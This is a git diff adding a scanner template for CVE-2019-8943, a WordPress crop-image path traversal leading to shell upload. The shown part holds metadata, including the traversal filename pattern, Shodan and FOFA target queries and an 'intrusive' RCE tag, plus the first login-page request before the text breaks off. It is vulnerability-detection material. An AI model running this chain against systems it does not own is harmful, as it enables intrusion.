diff --git a/http/cves/2019/CVE-2019-8943.yaml b/http/cves/2019/CVE-2019-8943.yaml new file mode 100644 index 0000000000..67131c4ebc --- /dev/null +++ b/http/cves/2019/CVE-2019-8943.yaml @@ -0,0 +1,313 @@ +id: CVE-2019-8943 + +info: + name: WordPress Core 5.0.0 - Crop-image Shell Upload + author: sttlr + severity: medium + description: | + WordPress through 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring. + reference: + - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/ + - http://packetstormsecurity.com/files/152396/WordPress-5.0.0-crop-image-Shell-Upload.html + - http://packetstormsecurity.com/files/161213/WordPress-5.0.0-Remote-Code-Execution.html + - http://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce + - https://tryhackme.com/r/room/blog + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N + cvss-score: 6.5 + cve-id: CVE-2019-8943 + cwe-id: CWE-22 + epss-score: 0.92778 + epss-percentile: 0.99097 + cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* + metadata: + verified: true + vendor: wordpress + product: wordpress + shodan-query: + - http.component:"wordpress" + - cpe:"cpe:2.3:a:wordpress:wordpress" + fofa-query: body="oembed" && body="wp-" + tags: cve,cve2019,wordpress,rce,intrusive,authenticated,packetstorm,wp-theme + +variables: + image_filename: "{{rand_text_alpha(10)}}" + string: "{{to_lower(rand_text_alpha(5))}}" + +flow: http(1) && http(2) && (http(3) || http(4)) && http(5) && http(6) && http(7) && http(8) && http(9) && http(10) && http(11) && http(12) && http(13) && http(14) && http(15) && http(16) + +http: + - raw: + - | + GET /wp-login.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + words: + - "WordPress" + - '/wp-login.php?action=lostpassword">Lost your password?' + - '